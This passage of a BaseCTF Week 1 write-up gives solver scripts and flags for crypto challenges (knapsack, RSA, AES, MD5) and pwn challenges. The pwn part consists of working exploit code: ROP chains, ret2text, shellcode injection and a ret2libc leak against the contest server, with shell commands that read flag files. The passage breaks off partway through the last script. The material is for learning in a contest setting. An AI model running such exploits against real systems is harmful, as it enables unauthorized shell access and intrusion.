91859873982601930765698107766946424315968932113724973875252752520495744658349166435087906664763198237819106317321871232725285852613201351155535304791295392982339051653723048621713854087558299, 27416797198170440695880404003135961426335900780086489077063102228234854286849577430053665684665123525576025865136178905344946412182398068100227278108238228179476948006111402146551358956042173, 6618792570596090569883178232621713030844697317972184177900266954498675602890666553071207714570183352868264445779550306428622314821163774496224109073830696331713973117656394498431868066547419, 2170402078990376080093979069174241330730093169079857263825716044536454255816623476318486713531051261924372354329543376436907081387161693951811518904258013624768207438418761774847657241464116, 444068419739995022918617734805868711289130441640491361059833564963918508148289061718666452354434057970227476744547047349557417149242164606932560068546338531971271707670031796603537502372902, 116657711114961473575551110004924695540253659208616449841332120251303948007722209463493630964437083428655981974738051994193994806043789586554127478932520376572981058192629163539170482099439, 26060438230704097273528583087224964538829526126764669880723211182150736154082956489319587015488424248074673973497150602509972124276820315641896501503925719577821672512750083923483639733416, 6312791407424911633066282842976932623335914208291314848182683302453777089215292160945721990083867179076948154652506406356338815828714441906485780965753668277560566183244931348859397184996, 1692738421964980687206278894671327723911704272751755954222196367628340111939187266884312772028554097537058570911615150944663230388612366056826914851034642492298594744849153229556190046330, 467525048501123667461709936020772038812998605707446973687794928398759672463134111033796530786478727006399722869173671763892936977996495279695995929887621412909042553923445043307978487073, 100524774903368088338735495212617525628101069016243368191042349062731422745652851141040067275932170134907320208205726289799197848585810532178559348960204294517902672414604810447030596048, 27814678376250636475963101212563090069738325215292874239553841311037561288624279025540601779796471707609056593491462913915467359662214011975515860736192625178250236017806638891058352841, 6146583639189016851959336110111529802617165794295583668085087256400497268514196451801697302172354876150306785802188833007655768181472221094475392274540015787948511952367768046413009035, 1972647620592074216061102097901025152958921034850117568363055778941629490654706191168761681590445732321415108675787531563680577749629570660705072798303247953275401784690900022657739322, 371444236734952267365204917912482218024760669256564601735746557802172061599306636753624221981211002583971063750448869544186339158302695225083644994003958727288476784454648096424712122, 122254251587569792335530528509722911970032904171801982862469794399827245263786995733489731913997837358853070479769024383526380208988565918719151600653752397319872277146128837497328015, 37286085540618400296289156352820709922577362907484951458689730829327977274283958429361031670068907334172105855310654077662912181145565822690393824208950538512990718744603086462751297, 8960386121829638279311227577342777825734976587843199435094340053720338004424184197136819101116475086084110882985205105967675766957208204488229410580925549838579346975088433058825112, 2276020215301107373585539745757682715066838555468744061772014192384015274014672056309929648681686089838637957127768944113418121587630588726390948566064269910008396907056486696440621, 607349939368134408551415861865227396073824635286316486245465114777775395388058059102705505424561001490318248134384090100571125911216424062773005875309952406284203774537367839133285, 119036276576206703263155095063111697848826207711313825926870015597766389307963670003146886377762517538032971265642879985310317695973899218804472784113163457901422724084711780785647, 42030777748108550530459203444475857940945563824576240738615672332753050069206966495014628929275783847295884969372071131041457167837216841146848083118096773135990284469263324779443, 7801996642301319152692691810553695688255137357013588495692283033031549008190374987427339686278893185224986120367594016951691992507271905708595080902010159659368839867860433342236, 2208574074019210752518459502962754515153645798717698412888529548015314931730564928870825878207969197632997431492713572137381185806543942907257429896476484304820878553303138599159, 768875672280773738301803816415515519067859985949784777815605972358140605222957399855931295900483405997209014872309627261455336173608212560504792804732406159988744626008190591642, 213430837881757766520777720690227709564760977311522001626864091515991137423909703305978776728094360822736833235760061066314816749758660033547207607953805341923438394772222356568, 82360211831711259567147082155555818156999516949891879514305397375226376936714506922756403002876731807095740268483307937613566131364594612432398098476300712735589147781570183292, 17749505352232170648277795567698933594199437689182764405380407013992895289676270195878470798816715217377777574478356564936400974585960088437473753598924064324383361905659789789, 3427214394932046144638723931330597473316067571098072662894954825121393877991928319931449114219100671521983554547487355301825989691873309784465316768877146988849237541879345997, 1033902507229521469775736346351634090020261583833297661608844489398831364552754846127512235344097362890795464047384509362185144853214501000183283440093026203459311568816825264, 224896235915885231383021605802223120291823571580780275950317681857821908865357784480256946962966353978144999197255874549242776446126658379098611152585008158970159741029928166, 46029158819241197707530664166476597494824578315547299718547883731820892091315435238631987346971891025923179798692039448953613556744177038196467650472219486883115951311114343, 11947866502696456680811378187645438096064991719463034800178755900009558951200835612294081250719346343143340755576335021624771970543003065673188450976052831967872919086392740, 2920182352645954475250456149302161189384947754266138653194940049989939156554780361528842542799077656577372777863627070726368904843252451856963117841700429655465449705784298, 641622426678020294248348183140299041659157650855760105808225416711044677800278294044700367798760043786235745613510792462327964867426046011657009528106413572140156175050547, 139954746021857963632941471710740997948822448809029403690252968784849647633362222415971470082427919553489814062772632095710992183657541577740542585479640231081279442703729, 26951287563812328009402867445459718346022404035671471571180747182520664735617063468580188663385794364598479725800534646437082877207222254951262061856164914161401031069085, 7533585444288704788707326472044821719148563540561950589462107215132713320228676563974287003223326227564110259498308322080055316439031345783355395296729881160340610419798, 2276681583409260736395242645263289467585348662731848036224090877214770286189504748163492790260653720049576572250410962278647838121717162502347694787530301107754917965930, 474556448905745036966775435479094252142291985759634322576584740921367165655972599891226896859675668151114091970232772247346351748955558953513984653925641106869750480713, 127434337967780172994097939061090682233760718060985516805855544997040535343689397647620215878303719159525314116562161004671399396862283153119456440081266677387394513825, 26958440398830097157570752848820597974607321452122682350667898050790790872944229259301257843111978215025542048968699222294492807645241856446964337776714971381969501071, 5543555284065922229007474385783130130141655633965977061928013317537397727717406514000700955159647395591026117082092382033235800387850239860460046217510413778741145568, 1234762639172810584930296374422356813288496696923257612102992994614585199225028932857122231293467541131628736229833789522239025569090130126077017761481761935075168095, 355466248406445302867530536283270751070714127588124044114582631609659246249339560304163152323418724390561360227173698743244037301264764126798143323643968965204937509, 72700233281268425015457883799224003903351225804106120865021630177680188790291132871915896124460090399131402188231983457135950533458784941828330878270977967060216148, 17316325779212303492370685449752299828026183539683998725619992507954441121758510621171086796417805607101134043617316264832615245565516418608812080799316990851625705, 4045793926070659592750134404331599438619282956075192844401269281007613550701517318190039173492631001707043977026685514125253560526115949503328595814800145874763660, 711093850172488751248536015688936346283846062295071944527029992467516277719725837096755918337587878576030222851749327532666344838291776707230618144013255672878802, 265627118033654696712457079751401631255125309014812639375295118794146799198801006240800873274048170518660448221821727034749291649708953722421725907035286053353872, 56397799026942637682063511042055387061218525595156363606895648399263418939712512484112089481484737116602512227228360835774657959685026627558074305176995845647003, 14485314789957973511455116454157965523985421493897618644045918045972073878396047755360530791556364199120111093825046698573687446383611922050184839529827282440392, 3550955573839595298078922255066479093374448121222507459840552079059417076208499387361330875700156148993662311858100125881757983588374422578671684157194578005699, 845394743568277367630651838202283372116209637644259875312243046465466486130071115873693547193074995290146894807692302774606698607144257685615262061054213977420, 157730148886711208861332893525227881346167845596707482474187376786153504516831765170538422967044056418676212271368775137847308449974344069982254963969728576186, 54972881967813310263623651713923315210166704822071760933248319000133464676004646169143078394020203091841106960137380702725337793156762085219469872257140065395, 10729618624425932454603285350456338562675184367958955898413107388221142096410983819404349570576694967179369846493834859543515755779034404675292796271503098978, 2442709998183758153870663320358670148543830566673551209180788899834647749860789589565309923762896818608005296106561164431377898506019097822580641263331814899, 651590036376284619471743663785818577107718418313829721360265583261583596100827943422638184205536113868285291626431841044058974804223249221103868269005376657, 114607798091152645971169174208076386390725220406372401915445980825934238917993417913942451617626679858301802459311641056076814238046173194524157303256038150, 39902529162554510030314089494503111747276505091248405060746015077422014506338256115473236342993594864048856417342484086620483648018566663638691082167406896, 7696036409658331229292571646244718273466046087174912598857625566056708582171413470987556822776798859431848832604237853020082821687940873973792941059899704, 2124793715529138812294972358553948624813291392446651644830711957681124971135340690294893448419315140942986852615187098678211216431027229098600530178187333, 658384832743376570742078380839633081933064245096557997421967190397377225701314189557712470669358349072689322858650074777626830988174808516744296032918846, 207441722934708037755237631720378642887937120813748348023809687455047615244353892880515039372882445336126456679753369371480841621878413386189854105557570, 46120989258570141716198175239164426659655378133453203231982537688000264558364343582463401621127725393877459942514087061448921695021828660135004811441077, 8188249463851855339650372248928765967441086033339032675901168172673586603869217763697984051550480433177801759541580074823902608731330486865652085135044, 2937142904794524692633847174299189664745670816742834573158221153146769098153095208026269794290966633578370921776670433893125934429015973900770183068397, 733124926365921400367689082582974550222406734787055535605162687013854196685186803977001257147200683812867023143593280536908792623212121135546302252718, 163278402453599131564496240174531690514528227885644439879148727669198836851619817419582703102053351987308732391369947772790306377652049104175405389057, 30247650270830046327693354982611104496891052070130966758534212809812843335592964533296290766840765263207385481421035739473846342013342141171267959427, 10078130422940933339521748812234495734268808180137214319132992860890442263439248960992021699437860319479050323778157839338656439168670198619111143719, 2468880502161574512996214909253394046701372930781084997897282377444297398943413058653731620475409298189864459900922031063170285510529204509174601472, 607074026100427506196023135076433955199278835550407310798426497629249872001552107547116229667872950481628543662982580322754725261269013849906534673, 132740473918237042219883376937810235079740145884708583638955667277623190279830437900121550989480157388767941856419463040395910600481643868918183256, 31718510456640085593521631697634193356173604238387825664787000835659167411973149050707246808351118400835035866343214347384616969135648635282147931, 7013023279079169100512494613396045516189395791014739872279083083144940194186933569894993097804928064121695159201540587912810973411497923430308118, 1771185586112090213616219590319917086599723206748079096836927259082387415598439340193771966567407719988569555116938671184047274203791682665544114, 397374970256811388188624914624139083024782079917643579178513419907217677561151325006437923068157587425558261984085274694860016959461272906962347, 79357052331733760410996870451429462826990142415371259214931967883012213322689987714484368914655142353136743730816759493623445282698964105194007, 18024995037150399824560351471574943556440673595591374226442857720036395804619368162299007566488606118476181051500800792556435843369345814420200, 3672082813534614033824027501205682677746304198256311647201407880518658491065244877413146229442328563967205873649123895823789401080903874966058, 884390448367024106697977520994089114652140177186827650340642302821550463666402143376715117683073225822100147575051185094558637911933790548300, 188239732756327819809744123998273956373038631188535307108080455432157193929576323356894115167616675699250266852372722398883063108283627629142, 33288603989729116913271536956952173835445978966530730095436444955036538722332958231617041802341417062090911709863572792283326143337721274355, 11485733967829072841907653505652765367596185911550254707130569392647462332893031105105058197515848740962693154105512628726167266984356020289, 2403399291804759683718697201628718853672014990022411946032431974098338948608647899389041474778909482165700212670301626696886803147288043249, 511319889754958068650171413169799880502913743237143323338990019288960892229714861654882544537650773480294037968794797914167989453965720824, 108151236227275669723663372909233127249406930188286111418173641508503812685900937356143956513296377001193855340520507635261983173020133040, 29238304319413057053313068686030250753447165587962843793828466785518433534702764546822180884428461976687744929459281379124786742084937021, 8710806082582848713173281808121766793059207164795295196447513451552342446919958461280536897422363560410120915054864290671091109422830007, 2960745852030782790607427333914261375033099283529370879973360161495226124203100530063141357601421786632355173585713266548540973431376582, 604226789553326438591187728019722484152820159976600984629527520901554123057786334839341626845330699593003318860611284025243121271706983, 182601602703012851376129630760230344746014108213070190831158648995503303041568836468914587260292443510296580408749988987988496769980026, 45452114165544367630569931330797239179068892066478030202246828842399491816831847850747717090783448434947452983100492335497009639567888, 17121905765418035275547423058447462707899580001255272989656046701474401090015657327101125412277786884745764423250530487272209339058447, 3774603297652275052121496733944137560240160153708941233671122697937317529256966828765637412706299259386179629160090242954994907929332, 1060720547441758622170146447289706124200025617853186951481807263542360257370083864882158715152433273118314629121456220166038646613297, 221968014150998259820244482577203245639303312867709655818056071267607816968641371724863025295597993367786164837699315327363092768373, 48882714266352303994499906166362680249387918980441207673706748487810074857456907593421757139320785593117603391693650930762966455968, 16202448926627445820838961561455164462246910065772244580677765363543397691542726082412061203163218760307389834156275979660359394394, 2956163682419868606126264117158250029934298756926288053091609992334385653684466888852763393290616941805759810929196668548734379973, 947743414350088412833104395509485078494688169216314527117041568424743421788079617145817207736081707175649820823460623353469499129, 184945524926843220565904193572688427321550948207655453104873607656563645624884025013598624332554709507217938881998831490973926770, 56091241819606834802888641120709675472905317085277369060569812131174812302014447128355020686805930142925377568700991226583887786, 11342476554725825973899273577573419030806527097049265365675861670559660391106730894000199354064208522140305551746468882526930218, 2402177443476249504669747634772796049517512708172380623039160322117732888388776939986309881254003733945369109368480598991083692, 779694676467776330674778030069618028430247798034244061629255618166403221248637754838157860401196252119142530084615889227008718, 279805151354990313327069866270353558845137298807826578854001581649814949600343606775647790956175906533124785285484676594205727, 71475104043185673882357779032282210215441549654529833915666511795774890652222328738683786126978390540777959958334867072773903, 17943539235945014339231354558742830502206047263873390682998140665294407299445224663761111928004278268665005924991145357190559, 4644026442647371851471373522652996931494883964189143247893482852205071445064380253582641516905658082237627505163407862645664, 1409644155578077661014560265925065735043498896729842671302999827395230787557009605337358883198670470099670153973385533319619, 323096734145812043063935925026236730750028036642046031570292345040624480525514361785469029998625026693350812690921739556759, 66490109788591511799221912380563668027716398810544644123382175383682357229245468554339935745239347569290928368121481198120, 12656292548243054261915436732277320096081079272327419007058490559709461117024442299280829706525636594720337557745657188367, 3391681366475824837488092758715214360838073187075047614113065989329609613896833473414068502642149439870471691863634629122, 1171517421153263625675697419132009454686117107914679030403775353063155717395912120634642665620725468223446139999071277507, 283703308943571467555327320427163735194765821724187323544643973406396459830945519805247147967066979142358739388094356677, 68051202286065965847502158995164914066216566669074127539650532219749577216638549042842244710379907101440823172129217941, 13657391854992511108591836048816405373941724899814769682716923188133130484869138365241075289816576384008939639840185236, 2883783693644859186835460708048379333567917588026714123591585397758887606304693027342351097912118721134282551369664243, 799049413981621014519709854919842048905323519892313665984919603393072653972864233067257746232644641382453549991205564, 167323486728516981799615013230008131717839880066330604897780052101994505570227406902019168715315935265773326851501787, 36720821966367632835200966450053402442515187808387796741238632349642200514749124280117021313827183586060369692397742, 9231349669963900651759770670625059190403421490616649578654575717995018536450416781815824036250202148465899261409814, 1782108859562682583955834770956766771890605266822317978330465547356702234978432274339716401371413673051273821401047, 403558799957529775306903388246707975744649346938130151765107472774892029713724284184220469230250620098654222513187, 113610170795802770344935864787382347027936273326387062416574602249889635787754346617875788451115772661826280534521, 32055073799513070460127524930885397197257512625854036561086683809899754909243064094359316603350553060664792782962, 9032924934526196049960770072668776382612241442724751839457302023155061259650364280524549081144893790536494565021, 2017862790729520323724155794794272872202696299996991444268875260039652843714149080734888358373743815054699872032, 641989462295283575733593919337192523868529607267791351139020713122159499889249625918896534847416953951571198300, 128576036185681041874919451733195397084174018792730182604376427967040903314850718633946179141568345684439398601, 40372047007036282320578970360805818319565465833073029617047122562052782556856211341854983376957243551410081742, 12690329041364261531787667832647179962305068888653710915257119208086200721695307184639464428289081103144163044, 3561839882694824398822284966776610177573484210494611237706713481725365094327241161248699081978241602830178596, 1199938132534089466501994820759235969832300222872622731608847912038243599132645129289586987692172765041057363, 324263436138121201088338125064781061780131145213294921711639118717892670326681104392825089385185080492440484, 68312903907509568411987755477707268100466381276451833349595552008166402404491773244111478626617324226539375, 17644820024620964580235818915132121042107943132825887368503777072488644953818352369186661300059264368686602, 3506176982938427175993147412444392161707218066658168782915638022559988465482121419504891010260766228901318, 1066127911891872518349397911557440606663336809214920827134975446907327509548040800613223772158827103310018, 226192414853873324160991825316404956087309825251607871786471768482769238181939189651359979648153657144702, 45868481610678874924581859998825662511897619432776149300471637861901025934649825592930301843850526560482, 13790618957198333318923230203705633437848971510707911225277092048085966476634360389032477412386316672075, 2577037700547459915849817513069936580425167358802123937052546118913600453224885074049561249688358836828, 907316011507113096967526321014989153923826069305244388586962072152306166058795915708345202709057953005, 257655812504204080571300921288974779044004152926402846615682864861219686480771224251979519937398150021, 49251062839756470728155099947305937498531111600022908848098152154867828870296984401906907127621922967, 18003086576459067165101290934987020831800807030229687007784917512221091664668503037255416369751058381, 3931602604129427365537886268681901399659904652265314628365560645602702305389347981284422957262198925, 1024271243554288667730540660664163792950639594042380266463713922650987059456833218457318808946966091, 264399551848126394660403560510401104363977298239470868728218368941030448200247464958990623172466340, 91991457278474569364064153570190123603908094841658212918408559703533962838464377716405517361239718, 22400319343956127928389329988299680966797095025488025868862978943959831082472834977311350142227326, 4054933925260064992644878588484342847457594792015796931877255389193313381697255433801823807489993, 1563931191287550417926830376062569859269361644002382824954373333292013041945346281280805769011292, 343600935590550484460351833584964172817805330710096798788745676605896512317351762955463013247649, 63176100013413022744650607325631187438860827337150751513958540819158680919377176592820951694123, 21461895060447171957232560518498142689748550789857829420960180353599240337920080298104122001920, 5835166770039346718590125171268445418773015279002775708686914119655634953623824713817863325421, 1583080965885530423876853196443645139416147803583378489670913938148126388391843537295818940207, 392027882718889629138666367076395194013822284370187648811904450742968357888850048132707951624, 84773060845038628419287336751649666625561226450930810787040749330985148718455599359011719538, 20913329354023188439880157138010537207897970146456506518137268768176475768733880753458923347, 4311750805563893138689876217833463788577851583828477282279295599052168675043703275872499679, 853899685398867377607396879875326827128843982112866203167371936104484725330862023846437598, 177330267045126383717093581983187474779454406408201086941455408963372790398670000549267776, 53143647775046286515978817675952110384368487980955438888997975610432428251415059859228454, 10991259161865360146194812310045803635018376660538575719261554366173833834812335245373835, 4056765217542521288464908532309700817396778995632736813131981648221349714370388148127516, 804624166261647601714189486709310419472244009530705820922420809512944365943834561839229, 221209387838524016717980366851546408106123634464083126244578703480033718962945353384984, 44893426704852156297812963470050296993434463573414592728231358819460836492051444088309, 15097276880249572944791099185953982641176811310343688646744220558627388586126270884093, 3177547688411513827329112344846258118128928380413096551275296685970663730887380521208, 707854681966281587817169996379236533896940250761506339446186239585936846532007717960, 123430766712269269314015844444108981877839453341743217081639119599583069918979135631, 42727196484340883716428235074652898935106385756024360939020725643288512665432787419, 9795023686113954751639542218587813833546340682044130681106706094735594753449446343, 3333589652095912448402556417544763364674016013042330262047943676041390880358346180, 947455010581251264347248926744940190279860580467728251791365397084078291899564124, 268670018298046298594544067046438306285322924770238391595093977430279476868065240, 78094390422018068485749659108183366278694042747549744891971134188665400412950020, 18124918094760916369648633132238959364840331932070152769613739914614309846704031, 4241888706533610079212359644998015902376872441583028817350629704555219530448753, 1292864973632566395230008219224138571254648896695439011761255646000025705327047, 268748278858999280597005392622004242197468731403889200124673378952297248513604, 88509143938000904019404561563568039020388387086033088264015176342184836107961, 20193371122440969904693011623640235956008535236609083989796068753247319156032, 4038600180280215891988824178178278280373636611246918842044528278230564207261, 1107150907782944887892399335890628523766269912586346493641592121812091723247, 210625186186013434779241292600805721380717453215450496819990522919652412749, 52953910211550391007013147620224873533688473472101985821194501496064403298, 9097555221706291288743269232756819233000414675958515393645941994120605160, 3429649093597174301305755373533641028744892761855146399462989664052400884, 741640028601865737636894538300654069448568041784703865806900024636263858, 137111267993711698795554790044192357770629382096307382022924712860324239, 38616149627736424773611788634842959989120382193171456026729095563767415, 9431485520373346422889960992205054090491173749526200420980321805553690, 1992952778532071559000019699416705938136688490627773967637839059076015, 574194788106589082411518870360486672683587224354718671901248024476268, 102609620640057348696515220693089742351613040750651566890644962920462, 36268823254475267212915191076327557136209959811616783925907478300982, 7567999544690811975942075962292580482677577353162367723788797894980, 1874140527739488453786828468118120241481575966337619572680165251377, 453914446353792760975691426663914252084437914832347163629988619705, 165150650733410175597931630292861667062273243834275274945484646602, 34566163119600685975060339689452757045437083897698838710019239494, 7694148541008402030841753047537726531717215585386379181283251145, 1697576884850411658454847805622249167935227079092758267244556419, 472437807783179983228633641986010243354676995634705949446120356, 119409918075506001971427759705853133156186846892920587610723175, 25613263424766799565203791718547119460962423676387668942984591, 7805142960598461841091346841458786166600096726425068620929337, 2767230135693902128766236987544547378777436388091785064756910, 689644486314086496286093830416975206144754872092432108597436, 138642086125227682870831666630271950088954885603515871632201, 30047434693445231347602467117028303851832764185641774643468, 6851801387424175873694354145711254327404855789285230103013, 2120042874205307146695207067554609162977513984517631857617, 490320105846897857421254356104910632681008002313418940471, 126323731373804665276167034060996983366300068355660603173, 21699921539905324453875345006818945922412432384306278913, 7939681050823987735942326816454304705408373515598927024, 1704054406000164917101338955641076586996654015897777293, 674629720702507360892410918497513853241707768110535720, 130116804903893330957629746403630277914984408897684191, 36586674897705341032938585410676119549859764313014514, 6820517853488553816157069373430435510514248629408934, 1940615831245060580576779381334292194461763717429719, 486407487540373443078130965659847688641455681092783, 115503902548715291215146001384729209189201342203617, 20726453501406140054607926221786392225949497849620, 5795586010156766459954451266198423523738902544440, 1894126095992857664160110316211206136427948391401, 400235284644456465531456917507977101554184036138, 96821039379669584765064498053975819680674844391, 23003305579401059533778299981921977893360385917, 5228073966664279351555893540080524011514115962, 1242198234479925081489833339665036257581784830, 412185918978837707936146917867270887000813745, 100133634343775138722999743130814482251294603, 26059544917887755330857182088221243972088111, 5139528748995372887990321340679356174733638, 1253542354308041615766358708614160342158058, 255695244303425264981809526736239333102982, 61808370933695923699986081041674755242751, 12426096507290278206573602748929564597975, 2986453750810080523307169404271220297061, 642144302488057714162005557670195083334, 130361391592026886001154254666792730817, 38722902212652057786773086799878934378, 7692285091800305362911294817569041066, 2668441901840977427307689562983863761, 627879703191450992712744583653335581, 143466848278452388635765854137055267, 40114449315047293082657646359855538, 9604649217508319090540717981276261, 2160954625898663094838587676686854, 663518655289550974870054172122371, 165231181091826810616798470843406, 32017505733146837917121936265672, 6710170503572414769550988030906, 2193907060628154300461720427652, 655138594818423378286082953437, 128372286376670762441323321515, 34081674525017606572942142473, 9410152783640368288366142632, 2828735859241558188208098320, 551007171562149788272788426, 123790351812017402954987183, 26171709615346256252881994, 5974406115827778237616062, 1129305631130982975444977, 309305180419035303006618, 63076647774929269450546, 17802308053095636943505, 5708739899619810440888, 1717642617243788103954, 487452007321104273269, 128040514304008259695, 22395338754966061650, 6980614247696882509, 1954726203330249242, 521378690601084559, 136837526017031961, 29173740577404415, 7191768065683254, 1621292657659019, 549037231011822, 141224784287699, 28266584508619, 8568210839573, 1730361037440, 343914088335, 79692432578, 29986725790, 6384194185, 1319027283, 483793159, 103505140, 22103086, 7280487, 2401760, 411716, 143073, 37097, 10436, 1884, 649, 134, 40, 14, 3, 1]
c= 2488656295807929935404316556194747314175977860755594014838879551525915558042003735363919054632036359039039831854134957725034750353847782168033537523854288427613513938991943920607437000388885418821419115067060003426834
backpack(a, c)

BaseCTF{2c4b0c15-3bee-4e4a-be6e-0f21e44bd4c9}

Week1 babyrsa

题目使用一个素数p作为n，此时有φ(p) = p - 1，那么d ≡ e^(-1) mod (p-1)，则m ≡ c^d mod p

from Crypto.Util.number import *

p = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832

# φ(p)
phi = p - 1

# d
d = pow(e, -1, phi)

print("Flag:", long_to_bytes(pow(c, d, p)).decode())

BaseCTF{7d7c90ae-1127-4170-9e0d-d796efcd305b}

Week1 十七倍

爆破原来的字符得到flag

def decrypt(cipher):
    flag = ""
    for c in cipher:
        for i in range(256):
            if (i * 17) % 256 == c:
                flag += chr(i)
                break
    return flag

cipher = [
    98, 113, 163, 181, 115, 148, 166,  43,   9,  95,
    165, 146,  79, 115, 146, 233, 112, 180,  48,  79,
    65, 181, 113, 146,  46, 249,  78, 183,  79, 133,
    180, 113, 146, 148, 163,  79,  78,  48, 231,  77
]

decrypted_flag = decrypt(cipher)
print("flag:", decrypted_flag)

BaseCTF{yoUr_CrYpt0_1earNinG_5tarTs_n0w}

Week1 helloCrypto

from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

key = long_to_bytes(208797759953288399620324890930572736628)
my_aes = AES.new(key, AES.MODE_ECB)
ciphertext = b'U\xcd\xf3\xb1 r\xa1\x8e\x88\x92Sf\x8a`Sk],\xa3(i\xcd\x11\xd0D\x1edd\x16[&\x92@^\xfc\xa9(\xee\xfd\xfb\x07\x7f:\x9b\x88\xfe{\xae'
plaintext = unpad(my_aes.decrypt(ciphertext), AES.block_size)
print(plaintext)

Week1 你会算md5吗

import hashlib

output = ['9d5ed678fe57bcca610140957afab571', '0cc175b9c0f1b6a831c399e269772661', '03c7c0ace395d80182db07ae2c30f034', 'e1671797c52e15f763380b45e841ec32', '0d61f8370cad1d412f80b84d143e1257', 'b9ece18c950afbfa6b0fdbfa4ff731d3', '800618943025315f869e4e1f09471012', 'f95b70fdc3088560732a5ac135644506', '0cc175b9c0f1b6a831c399e269772661', 'a87ff679a2f3e71d9181a67b7542122c', '92eb5ffee6ae2fec3ad71c777531578f', '8fa14cdd754f91cc6554c9e71929cce7', 'a87ff679a2f3e71d9181a67b7542122c', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '0cc175b9c0f1b6a831c399e269772661', 'e4da3b7fbbce2345d7772b0674a318d5', '336d5ebc5436534e61d16e63ddfca327', 'eccbc87e4b5ce2fe28308fd9f2a7baf3', '8fa14cdd754f91cc6554c9e71929cce7', '8fa14cdd754f91cc6554c9e71929cce7', '45c48cce2e2d7fbdea1afc51c7c6ad26', '336d5ebc5436534e61d16e63ddfca327', 'a87ff679a2f3e71d9181a67b7542122c', '8f14e45fceea167a5a36dedd4bea2543', '1679091c5a880faf6fb5e6087eb1b2dc', 'a87ff679a2f3e71d9181a67b7542122c', '336d5ebc5436534e61d16e63ddfca327', '92eb5ffee6ae2fec3ad71c777531578f', '8277e0910d750195b448797616e091ad', '0cc175b9c0f1b6a831c399e269772661', 'c81e728d9d4c2f636f067f89cc14862c', '336d5ebc5436534e61d16e63ddfca327', '0cc175b9c0f1b6a831c399e269772661', '8fa14cdd754f91cc6554c9e71929cce7', 'c9f0f895fb98ab9159f51fd0297e236d', 'e1671797c52e15f763380b45e841ec32', 'e1671797c52e15f763380b45e841ec32', 'a87ff679a2f3e71d9181a67b7542122c', '8277e0910d750195b448797616e091ad', '92eb5ffee6ae2fec3ad71c777531578f', '45c48cce2e2d7fbdea1afc51c7c6ad26', '0cc175b9c0f1b6a831c399e269772661', 'c9f0f895fb98ab9159f51fd0297e236d', '0cc175b9c0f1b6a831c399e269772661', 'cbb184dd8e05c9709e5dcaedaa0495cf']

flag = ''
for md5 in output:
    for char in range(32, 127):
        if hashlib.md5(bytes([char])).hexdigest() == md5:
            flag += chr(char)

print(flag)

BaseCTF{a4bf43a5-3ff9-4764-bda2-af8ee4db9a8a}

Week1 ez_rsa

from sympy import symbols, Eq, solve
from Crypto.Util.number import long_to_bytes, inverse

n = 96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421
#not_phi=(p+2)*(q+2)
not_phi = 96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205
c = 37077223015399348092851894372646658604740267343644217689655405286963638119001805842457783136228509659145024536105346167019011411567936952592106648947994192469223516127472421779354488529147931251709280386948262922098480060585438392212246591935850115718989480740299246709231437138646467532794139869741318202945
e = 65537
p_plus_q = (not_phi - n - 4) // 2

x = symbols('x')
eq1 = Eq(x ** 2 - p_plus_q * x + n, 0)
solutions = solve(eq1)

p = int(solutions[0])
q = int(solutions[1])

assert p * q == n

phi_n = (p - 1) * (q - 1)

d = inverse(e, phi_n)

m = pow(c, d, n)

flag = long_to_bytes(m)
print(flag)

BaseCTF{it_1s_ez!!}

PWN

Week1 我把她丢了

rop链需要ret作为滑板

from pwn import *

context(log_level='debug')
p = remote("challenge.basectf.fun", 24280)

pop_rdi = 0x0000000000401196
ret = 0x000000000040101a
str_bin_sh = 0x402008
system = 0x0401080

payload = b"A" * (0x70 + 0x8) + p64(ret) + p64(pop_rdi) + p64(str_bin_sh) + p64(system)
p.sendlineafter(b"I lost her, what should I do? Help me find her.", payload)
p.sendline(b"cat${IFS}flag")

p.interactive()

Week1 Ret2text

ret2text

from pwn import *
p = remote("challenge.basectf.fun",43152)
backdoor = 0x04011A4
payload = (0x20+0x8)*b'\x00' + p64(0x000000000040101a) + p64(backdoor)
p.sendline(payload)
p.sendline(b"cat${IFS}flag")
p.interactive()

BaseCTF{2d50a54d-9c7d-4d12-bcd9-14aed02eee80}

Week1 shellcode_level0

ret2shellcode

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
p = remote("challenge.basectf.fun", 43626)

payload = asm(shellcraft.sh())
p.recvuntil(b"please input shellcode: ")
p.sendline(payload)
p.sendline(b"cat${IFS}flag")

p.interactive()

BaseCTF{74724bbd-f76d-4a52-aa8f-3b71e5227a7a}

Week1 签个到吧

cat flag

BaseCTF{84334f64-0731-4425-b804-532af4b78fca}

Week1 echo

重定向输入

from pwn import *
p = remote("challenge.basectf.fun",31340)
p.sendline(b"while read line; do echo $line; done < flag")
p.interactive()

BaseCTF{cece856a-c546-456b-a9a0-37df58bbb666}

Week1 彻底失去她

ret2libc

from pwn import *
from LibcSearcher import *

context(arch='amd64', os='linux', log_level='debug')
elf = ELF('彻底失去她')
p = remote("challenge.basectf.fun",46254)
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# p = process('彻底失去她')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
start = 0x00000000004010B0
pop_rdi = 0x0000000000401196
ret = 0x000000000040101a

p.recvuntil(b"By the way, I still don't know your name, could you tell me your name?")
payload = b"a" * (0xA + 0X8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(start)
p.sendline(payload)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
log.info('addr: '+hex(puts_addr))

#9 - libc6_2.35-0ubuntu3.8_amd64
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")

bin_sh = libc_base + libc.dump('str_bin_sh')
system = libc_base + libc.dump("system")

p.recvuntil(b"By the way, I still don't know your name, could you tell me your name?")
